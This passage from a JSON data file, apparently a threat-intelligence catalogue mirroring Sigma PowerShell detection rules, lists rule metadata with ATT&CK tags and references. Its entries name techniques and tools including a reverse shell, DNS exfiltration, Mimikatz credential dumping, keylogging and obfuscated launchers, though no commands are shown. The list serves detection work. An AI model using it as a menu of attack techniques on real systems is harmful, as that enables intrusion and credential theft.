"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_import_module_susp_dirs.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2022/07/07", - "filename": "posh_ps_import_module_susp_dirs.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may use Valid Accounts to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user.", - "uuid": "7b836d7f-179c-4ba4-90a7-a7e60afb48e6", - "value": "Execute Invoke-command on Remote Host", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.006/T1021.006.md#atomic-test-2---invoke-command", - "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/invoke-command?view=powershell-7.2", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_command_remote.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.t1021.006" - ], - "creation_date": "2022/01/07", - "filename": "posh_ps_invoke_command_remote.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Legitimate script" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "DNSExfiltrator allows for transferring (exfiltrate) a file over a DNS request covert channel", - "uuid": "d59d7842-9a21-4bc6-ba98-64bfe0091355", - "value": "Powershell DNSExfiltration", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1048/T1048.md#atomic-test-3---dnsexfiltration-doh", - "https://github.com/Arno0x/DNSExfiltrator", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_dnsexfiltration.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.t1048" - ], - "creation_date": "2022/01/07", - "filename": "posh_ps_invoke_dnsexfiltration.yml", - "author": "frack113", - "level": "high", - "falsepositive": [ - "Legitimate script" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Detects Commandlet name for PrintNightmare exploitation.", - "uuid": "6d3f1399-a81c-4409-aff3-1ecfe9330baf", - "value": "PrintNightmare Powershell Exploitation", - "meta": { - "refs": [ - "https://github.com/calebstewart/CVE-2021-1675", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_nightmare.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1548" - ], - "creation_date": "2021/08/09", - "filename": "posh_ps_invoke_nightmare.yml", - "author": "Max Altgelt, Tobias Michalski", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", - "uuid": "73e67340-0d25-11eb-adc1-0242ac120002", - "value": "Invoke-Obfuscation CLIP+ Launcher - PowerShell", - "meta": { - "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_clip.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2020/10/13", - "filename": "posh_ps_invoke_obfuscation_clip.yml", - "author": "Jonathan Cheong, oscd.community", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block \\u2014", - "uuid": "1b9dc62e-6e9e-42a3-8990-94d7a10007f7", - "value": "Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell", - "meta": { - "refs": [ - "https://github.com/danielbohannon/Invoke-Obfuscation/blob/f20e7f843edd0a3a7716736e9eddfa423395dd26/Out-ObfuscatedStringCommand.ps1#L873-L888", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_obfuscated_iex.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2019/11/08", - "filename": "posh_ps_invoke_obfuscation_obfuscated_iex.yml", - "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Detects Obfuscated use of stdin to execute PowerShell", - "uuid": "779c8c12-0eb1-11eb-adc1-0242ac120002", - "value": "Invoke-Obfuscation STDIN+ Launcher - Powershell", - "meta": { - "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_stdin.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2020/10/15", - "filename": "posh_ps_invoke_obfuscation_stdin.yml", - "author": "Jonathan Cheong, oscd.community", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", - "uuid": "0adfbc14-0ed1-11eb-adc1-0242ac120002", - "value": "Invoke-Obfuscation VAR+ Launcher - PowerShell", - "meta": { - "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_var.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2020/10/15", - "filename": "posh_ps_invoke_obfuscation_var.yml", - "author": "Jonathan Cheong, oscd.community", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Detects Obfuscated Powershell via COMPRESS OBFUSCATION", - "uuid": "20e5497e-331c-4cd5-8d36-935f6e2a9a07", - "value": "Invoke-Obfuscation COMPRESS OBFUSCATION - PowerShell", - "meta": { - "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_via_compress.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2020/10/18", - "filename": "posh_ps_invoke_obfuscation_via_compress.yml", - "author": "Timur Zinniatullin, oscd.community", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Detects Obfuscated Powershell via RUNDLL LAUNCHER", - "uuid": "e6cb92b4-b470-4eb8-8a9d-d63e8583aae0", - "value": "Invoke-Obfuscation RUNDLL LAUNCHER - PowerShell", - "meta": { - "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_via_rundll.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2020/10/18", - "filename": "posh_ps_invoke_obfuscation_via_rundll.yml", - "author": "Timur Zinniatullin, oscd.community", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Detects Obfuscated Powershell via Stdin in Scripts", - "uuid": "86b896ba-ffa1-4fea-83e3-ee28a4c915c7", - "value": "Invoke-Obfuscation Via Stdin - Powershell", - "meta": { - "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_via_stdin.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2020/10/12", - "filename": "posh_ps_invoke_obfuscation_via_stdin.yml", - "author": "Nikita Nazarov, oscd.community", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", - "uuid": "db92dd33-a3ad-49cf-8c2c-608c3e30ace0", - "value": "Invoke-Obfuscation Via Use Clip - Powershell", - "meta": { - "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_via_use_clip.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2020/10/09", - "filename": "posh_ps_invoke_obfuscation_via_use_clip.yml", - "author": "Nikita Nazarov, oscd.community", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", - "uuid": "e55a5195-4724-480e-a77e-3ebe64bd3759", - "value": "Invoke-Obfuscation Via Use MSHTA - PowerShell", - "meta": { - "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_via_use_mhsta.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2020/10/08", - "filename": "posh_ps_invoke_obfuscation_via_use_mhsta.yml", - "author": "Nikita Nazarov, oscd.community", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", - "uuid": "a5a30a6e-75ca-4233-8b8c-42e0f2037d3b", - "value": "Invoke-Obfuscation Via Use Rundll32 - PowerShell", - "meta": { - "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_via_use_rundll32.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2019/10/08", - "filename": "posh_ps_invoke_obfuscation_via_use_rundll32.yml", - "author": "Nikita Nazarov, oscd.community", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", - "uuid": "e54f5149-6ba3-49cf-b153-070d24679126", - "value": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell", - "meta": { - "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_via_var.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2020/10/13", - "filename": "posh_ps_invoke_obfuscation_via_var.yml", - "author": "Timur Zinniatullin, oscd.community", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may log user keystrokes to intercept credentials as the user types them.", - "uuid": "34f90d3c-c297-49e9-b26d-911b05a4866c", - "value": "Powershell Keylogging", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.001/src/Get-Keystrokes.ps1", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_keylogging.yml" - ], - "tags": [ - "attack.collection", - "attack.t1056.001" - ], - "creation_date": "2021/07/30", - "filename": "posh_ps_keylogging.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may manipulate accounts to maintain access to victim systems.\nAccount manipulation may consist of any action that preserves adversary access to a compromised account, such as modifying credentials or permission groups\n", - "uuid": "4fdc44df-bfe9-4fcc-b041-68f5a2d3031c", - "value": "Powershell LocalAccount Manipulation", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1098/T1098.md#atomic-test-1---admin-account-manipulate", - "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.localaccounts/?view=powershell-5.1", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_localuser.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1098" - ], - "creation_date": "2021/12/28", - "filename": "posh_ps_localuser.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Legitimate administrative script" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Detects usage of the powerShell New-MailboxExportRequest Cmdlet to exports a mailbox to a remote or local share, as used in ProxyShell exploitations", - "uuid": "4a241dea-235b-4a7e-8d76-50d817b146c4", - "value": "Suspicious PowerShell Mailbox Export to Share - PS", - "meta": { - "refs": [ - "https://youtu.be/5mqid-7zp8k?t=2481", - "https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html", - "https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1", - "https://m365internals.com/2022/10/07/hunting-in-on-premises-exchange-server-logs/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_mailboxexport_share.yml" - ], - "tags": [ - "attack.exfiltration" - ], - "creation_date": "2022/10/26", - "filename": "posh_ps_mailboxexport_share.yml", - "author": "Nasreddine Bencherchali", - "level": "critical", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Detects Commandlet names from well-known PowerShell exploitation frameworks", - "uuid": "89819aa4-bbd6-46bc-88ec-c7f7fe30efa6", - "value": "Malicious PowerShell Commandlets", - "meta": { - "refs": [ - "https://adsecurity.org/?p=2921", - "https://github.com/S3cur3Th1sSh1t/PowerSharpPack/tree/master/PowerSharpBinaries", - "https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1", - "https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1", - "https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1", - "https://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPasswordSpray.ps1", - "https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/", - "https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_malicious_commandlets.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2017/03/05", - "filename": "posh_ps_malicious_commandlets.yml", - "author": "Sean Metcalf (source), Florian Roth (rule), Bartlomiej Czyz @bczyz1 (update), oscd.community (update), Nasreddine Bencherchali (update), Tim Shelton (fp), Mustafa Kaan Demir (update), Georg Lauenstein (update)", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Detects keywords from well-known PowerShell exploitation frameworks", - "uuid": "f62176f3-8128-4faa-bf6c-83261322e5eb", - "value": "Malicious PowerShell Keywords", - "meta": { - "refs": [ - "https://adsecurity.org/?p=2921", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_malicious_keywords.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2017/03/05", - "filename": "posh_ps_malicious_keywords.yml", - "author": "Sean Metcalf (source), Florian Roth (rule)", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Detects usage of a PowerShell command to dump the live memory of a Windows machine", - "uuid": "cd185561-4760-45d6-a63e-a51325112cae", - "value": "Live Memory Dump Using Powershell", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/powershell/module/storage/get-storagediagnosticinfo", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_memorydump_getstoragediagnosticinfo.yml" - ], - "tags": [ - "attack.t1003" - ], - "creation_date": "2021/09/21", - "filename": "posh_ps_memorydump_getstoragediagnosticinfo.yml", - "author": "Max Altgelt", - "level": "high", - "falsepositive": [ - "Diagnostics" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Detect malicious GPO modifications can be used to implement many other malicious behaviors.", - "uuid": "b7216a7d-687e-4c8d-82b1-3080b2ad961f", - "value": "Modify Group Policy Settings - ScriptBlockLogging", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1484.001/T1484.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_modify_group_policy_settings.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1484.001" - ], - "creation_date": "2022/08/19", - "filename": "posh_ps_modify_group_policy_settings.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Legitimate use" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may abuse PowerShell commands and scripts for execution.\nPowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. (Citation: TechNet PowerShell)\nAdversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code\n", - "uuid": "78aa1347-1517-4454-9982-b338d6df8343", - "value": "Powershell MsXml COM Object", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.001/T1059.001.md#atomic-test-7---powershell-msxml-com-object---with-prompt", - "https://docs.microsoft.com/en-us/previous-versions/windows/desktop/ms766431(v=vs.85)", - "https://www.trendmicro.com/en_id/research/22/e/uncovering-a-kingminer-botnet-attack-using-trend-micro-managed-x.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_msxml_com.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2022/01/19", - "filename": "posh_ps_msxml_com.yml", - "author": "frack113, MatilJ", - "level": "medium", - "falsepositive": [ - "Legitimate administrative script" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Detects Commandlet names and arguments from the Nishang exploitation framework", - "uuid": "f772cee9-b7c2-4cb2-8f07-49870adc02e0", - "value": "Malicious Nishang PowerShell Commandlets", - "meta": { - "refs": [ - "https://github.com/samratashok/nishang", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_nishang_malicious_commandlets.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2019/05/16", - "filename": "posh_ps_nishang_malicious_commandlets.yml", - "author": "Alec Costello", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Detects writing data into NTFS alternate data streams from powershell. Needs Script Block Logging.", - "uuid": "8c521530-5169-495d-a199-0a3a881ad24e", - "value": "NTFS Alternate Data Stream", - "meta": { - "refs": [ - "http://www.powertheshell.com/ntfsstreams/", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.004/T1564.004.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_ntfs_ads_access.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1564.004", - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2018/07/24", - "filename": "posh_ps_ntfs_ads_access.yml", - "author": "Sami Ruohonen", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may abuse Microsoft Office add-ins to obtain persistence on a compromised system.\nOffice add-ins can be used to add functionality to Office programs\n", - "uuid": "36fbec91-fa1b-4d5d-8df1-8d8edcb632ad", - "value": "Code Executed Via Office Add-in XLL File", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1137.006/T1137.006.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_office_comobject_registerxll.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1137.006" - ], - "creation_date": "2021/12/28", - "filename": "posh_ps_office_comobject_registerxll.yml", - "author": "frack113", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Detects Invoke-Mimikatz PowerShell script and alike. Mimikatz is a credential dumper capable of obtaining plaintext Windows account logins and passwords.", - "uuid": "189e3b02-82b2-4b90-9662-411eb64486d4", - "value": "Potential Invoke-Mimikatz PowerShell Script", - "meta": { - "refs": [ - "https://www.elastic.co/guide/en/security/current/potential-invoke-mimikatz-powershell-script.html#potential-invoke-mimikatz-powershell-script", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_potential_invoke_mimikatz.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003" - ], - "creation_date": "2022/09/28", - "filename": "posh_ps_potential_invoke_mimikatz.yml", - "author": "Tim Rauch", - "level": "high", - "falsepositive": [ - "Mimikatz can be useful for testing the security of networks" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Detects Commandlet names from PowerView of PowerSploit exploitation framework.", - "uuid": "dcd74b95-3f36-4ed9-9598-0490951643aa", - "value": "Malicious PowerView PowerShell Commandlets", - "meta": { - "refs": [ - "https://powersploit.readthedocs.io/en/stable/Recon/README", - "https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon", - "https://thedfirreport.com/2020/10/08/ryuks-return", - "https://adsecurity.org/?p=2277", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_powerview_malicious_commandlets.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2021/05/18", - "filename": "posh_ps_powerview_malicious_commandlets.yml", - "author": "Bhabesh Raj", - "level": "high", - "falsepositive": [ - "Should not be any as administrators do not use this tool" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Detects PowerShell calling a credential prompt", - "uuid": "ca8b77a9-d499-4095-b793-5d5f330d450e", - "value": "PowerShell Credential Prompt", - "meta": { - "refs": [ - "https://twitter.com/JohnLaTwC/status/850381440629981184", - "https://t.co/ezOTGy1a1G", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_prompt_credentials.yml" - ], - "tags": [ - "attack.credential_access", - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2017/04/09", - "filename": "posh_ps_prompt_credentials.yml", - "author": "John Lambert (idea), Florian Roth (rule)", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Detects the use of PSAsyncShell an Asynchronous TCP Reverse Shell written in powershell", - "uuid": "afd3df04-948d-46f6-ae44-25966c44b97f", - "value": "PSAsyncShell - Asynchronous TCP Reverse Shell", - "meta": { - "refs": [ - "https://github.com/JoelGMSec/PSAsyncShell", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_psasyncshell.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2022/10/04", - "filename": "posh_ps_psasyncshell.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Detects the use of PSAttack PowerShell hack tool", - "uuid": "b7ec41a4-042c-4f31-a5db-d0fcde9fa5c5", - "value": "PowerShell PSAttack", - "meta": { - "refs": [ - "https://adsecurity.org/?p=2921", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_psattack.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2017/03/05", - "filename": "posh_ps_psattack.yml", - "author": "Sean Metcalf (source), Florian Roth (rule)", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may abuse PowerShell commands and scripts for execution.\nPowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system\n", - "uuid": "a0edd39f-a0c6-4c17-8141-261f958e8d8f", - "value": "PowerShell Remote Session Creation", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.001/T1059.001.md#atomic-test-10---powershell-invoke-downloadcradle", - "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/new-pssession?view=powershell-7.2", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_remote_session_creation.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2022/01/06", - "filename": "posh_ps_remote_session_creation.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Legitimate administrative script" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Powershell Remove-Item with -Path to delete a file or a folder with \"-Recurse\"", - "uuid": "b8af5f36-1361-4ebe-9e76-e36128d947bf", - "value": "Use Remove-Item to Delete File", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.004/T1070.004.md", - "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/Remove-Item?view=powershell-5.1&viewFallbackFrom=powershell-7", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_remove_item_path.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1070.004" - ], - "creation_date": "2022/01/15", - "filename": "posh_ps_remove_item_path.yml", - "author": "frack113", - "level": "low", - "falsepositive": [ - "Legitimate PowerShell scripts" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "utilize native PowerShell Identity modules to query the domain to extract the Service Principal Names for a single computer.\nThis behavior is typically used during a kerberos or silver ticket attack.\nA successful execution will output the SPNs for the endpoint in question.\n", - "uuid": "a861d835-af37-4930-bcd6-5b178bfb54df", - "value": "Request A Single Ticket via PowerShell", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1558.003/T1558.003.md#atomic-test-4---request-a-single-ticket-via-powershell", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_request_kerberos_ticket.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1558.003" - ], - "creation_date": "2021/12/28", - "filename": "posh_ps_request_kerberos_ticket.yml", - "author": "frack113", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.", - "uuid": "42821614-9264-4761-acfc-5772c3286f76", - "value": "Root Certificate Installed - PowerShell", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.004/T1553.004.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_root_certificate_installed.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1553.004" - ], - "creation_date": "2020/10/10", - "filename": "posh_ps_root_certificate_installed.yml", - "author": "oscd.community, @redcanary, Zach Stanford @svch0st", - "level": "medium", - "falsepositive": [ - "Help Desk or IT may need to manually add a corporate Root CA on occasion. Need to test if GPO push doesn't trigger FP" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may abuse container files such as disk image (.iso, .vhd) file formats to deliver malicious payloads that may not be tagged with MOTW.", - "uuid": "902cedee-0398-4e3a-8183-6f3a89773a96", - "value": "Suspicious Invoke-Item From Mount-DiskImage", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.005/T1553.005.md#atomic-test-2---mount-an-iso-image-and-run-executable-from-the-iso", - "https://docs.microsoft.com/en-us/powershell/module/storage/mount-diskimage?view=windowsserver2022-ps", - 